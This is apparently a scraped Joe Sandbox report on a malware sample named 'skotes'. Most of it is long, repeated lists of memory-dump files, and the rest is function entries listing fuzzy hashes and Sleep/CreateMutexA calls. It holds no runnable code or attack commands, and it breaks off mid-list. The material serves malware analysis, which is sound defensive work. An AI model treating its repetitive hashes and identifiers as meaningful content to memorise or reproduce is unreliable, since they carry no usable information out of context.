Associated: 00000001.00000002.1734990497.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735008087.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735029886.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735050700.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735069109.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735089293.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735172463.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735221642.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735247569.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735320354.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735346718.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735367648.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735386720.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ce800a15cdb1e8c52b55073dcbbf06fe676e11b83872d046dd26c57a2a303a6f
Instruction ID: a0b241f54a3ca9c2c907bb3c5850fd9843af59fe5a55e47cf82db4ce8bd0e036
Opcode Fuzzy Hash: ce800a15cdb1e8c52b55073dcbbf06fe676e11b83872d046dd26c57a2a303a6f
Instruction Fuzzy Hash: 56318A31B051018BEB08DB79DD89B6DB766EBC6311F248319E824D72D0C73699C8875A

Function 0095A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000001.00000002.1733994735.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.1733977579.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1733994735.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734054041.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734192369.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734215049.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734229440.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734247166.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734368698.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734387046.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734408867.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734427412.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734482466.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734500729.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734518471.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734535780.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734555087.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734572416.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734590165.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734610550.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734628591.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734645540.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734666014.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734687409.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734709835.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734727846.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734745395.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734764734.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734784728.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734802710.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734824881.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734842567.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734860896.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734879381.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734898220.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734916451.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734935580.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734953662.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734971451.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734990497.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735008087.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735029886.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735050700.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735069109.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735089293.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735172463.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735221642.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735247569.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735320354.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735346718.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735367648.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735386720.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: aae4f44a369b00e3d0c79d6bb4156304ef6aecd0bb0bffaaa6e849de14f32290
Instruction ID: 91d5c82f81f42dc8da21b275e2060ea99e7eae0358c2a08a6d520271da33b5c4
Opcode Fuzzy Hash: aae4f44a369b00e3d0c79d6bb4156304ef6aecd0bb0bffaaa6e849de14f32290
Instruction Fuzzy Hash: 7E316631B011008BEB08EBB9DD89B6DB766EFC1315F248318E814DB3E5C77599C8876A

Function 0095A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000001.00000002.1733994735.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.1733977579.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1733994735.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734054041.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734192369.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734215049.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734229440.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734247166.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734368698.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734387046.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734408867.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734427412.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734482466.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734500729.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734518471.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734535780.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734555087.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734572416.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734590165.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734610550.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734628591.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734645540.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734666014.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734687409.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734709835.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734727846.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734745395.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734764734.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734784728.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734802710.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734824881.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734842567.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734860896.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734879381.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734898220.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734916451.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734935580.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734953662.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734971451.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734990497.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735008087.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735029886.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735050700.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735069109.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735089293.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735172463.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735221642.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735247569.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735320354.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735346718.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735367648.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735386720.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 472d45d44f26073365d0107953e3f568ef45e1fe36fe32d0852c42a957b9c74c
Instruction ID: 42f348ee5adabeb164cf8b0563879d293717b9a27898ffe7c4a97c934e4477b6
Opcode Fuzzy Hash: 472d45d44f26073365d0107953e3f568ef45e1fe36fe32d0852c42a957b9c74c
Instruction Fuzzy Hash: B3318B31B051008BEB08EB79DDC9B6DB766EFC1325F248718E814DB3E1D7359989871A

Function 0095A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000001.00000002.1733994735.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.1733977579.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1733994735.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734054041.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734192369.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734215049.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734229440.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734247166.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734368698.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734387046.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734408867.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734427412.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734482466.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734500729.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734518471.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734535780.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734555087.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734572416.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734590165.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734610550.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734628591.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734645540.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734666014.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734687409.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734709835.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734727846.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734745395.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734764734.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734784728.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734802710.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734824881.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734842567.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734860896.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734879381.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734898220.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734916451.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734935580.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734953662.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734971451.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734990497.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735008087.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735029886.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735050700.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735069109.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735089293.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735172463.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735221642.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735247569.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735320354.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735346718.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735367648.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735386720.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: fddda0ae290c9b9439fb8c270d827bd16a85bde8211609e9a2feee28386c7a04
Instruction ID: f7f01341ba74640a50973a2d360f4103f54efcb757025fc15f718b0214fb6014
Opcode Fuzzy Hash: fddda0ae290c9b9439fb8c270d827bd16a85bde8211609e9a2feee28386c7a04
Instruction Fuzzy Hash: F331A831B012008BEB08DB7ADD89B6DB776EFC5325F248718E814DB3E1C7359988875A

Function 00959ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000001.00000002.1733994735.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.1733977579.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1733994735.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734054041.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734192369.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734215049.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734229440.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734247166.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734368698.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734387046.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734408867.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734427412.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734482466.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734500729.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734518471.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734535780.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734555087.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734572416.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734590165.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734610550.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734628591.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734645540.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734666014.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734687409.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734709835.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734727846.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734745395.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734764734.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734784728.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734802710.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734824881.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734842567.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734860896.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734879381.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734898220.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734916451.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734935580.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734953662.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734971451.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734990497.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735008087.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735029886.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735050700.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735069109.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735089293.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735172463.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735221642.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735247569.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735320354.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735346718.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735367648.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735386720.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 0eadb23ca1d9aca31f00cb9c10d7c4ede71e12da299065587820446618341734
Instruction ID: d95362182e72488eeff97d3259c2cef3e2fedcb3b2d3660bddcc508cf76cf906
Opcode Fuzzy Hash: 0eadb23ca1d9aca31f00cb9c10d7c4ede71e12da299065587820446618341734
Instruction Fuzzy Hash: DB217931705200DBFB18DB29ED89B6DB766EBC1311F244319E818D76E1CB7599848716

Function 0095A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000001.00000002.1733994735.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.1733977579.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1733994735.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734054041.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734192369.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734215049.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
